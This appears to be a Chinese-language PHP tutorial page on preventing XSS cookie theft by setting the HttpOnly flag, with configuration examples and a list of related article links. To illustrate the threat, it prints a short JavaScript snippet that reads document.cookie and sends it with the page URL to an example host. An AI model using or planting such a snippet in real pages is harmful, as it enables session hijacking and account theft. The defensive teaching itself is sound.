xss防御之php利用httponly防xss攻击

2015-01-24信息快讯网

这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly

//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过:

header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是万能的!

PHP中feof()函数实例测试
PHP实现利用MySQL保存session的方法
ThinkPHP后台首页index使用frameset时的注意事项分析
ThinkPHP模板替换与系统常量及应用实例教程
ThinkPHP调试模式与日志记录概述
destoon出现验证码不显示时的紧急处理方法
destoon供应信息title调用出公司名称的方法
destoon实现不同会员组公司名称显示不同的颜色的方法
destoon文章模块调用企业会员资料的方法
PHP函数http_build_query使用详解
PHP针对常规模板引擎中与CSS/JSON冲突的解决方法
php中Session的生成机制、回收机制和存储机制探究
PHP Session机制简介及用法
PHP实现取得HTTP请求的原文
PHP JSON出错:Cannot use object of type stdClass as array解决方法
PHP中模拟处理HTTP PUT请求的例子
php下获取http状态的实现代码
php实现httpclient类示例
php动态生成函数示例
php5.3 goto函数介绍和示例
php ctype函数中文翻译和示例
php的declare控制符和ticks教程(附示例)
php像数组一样存取和修改字符串字符
php设置session值和cookies的学习示例
PHP fopen()和 file_get_contents()应用与差异介绍
PHP的password_hash()使用实例
zf框架的session会话周期及次数限制使用示例
PHP中isset()和unset()函数的用法小结
php function用法如何递归及return和echo区别
php判断是否为json格式的方法
php ci框架中加载css和js文件失败的解决方法
php中调用其他系统http接口的方法说明
实现获取http内容的php函数分享
php使用curl访问https示例分享
解决file_get_contents无法请求https连接的方法
php中用socket模拟http中post或者get提交数据的示例代码
©2014-2024 dbsqp.com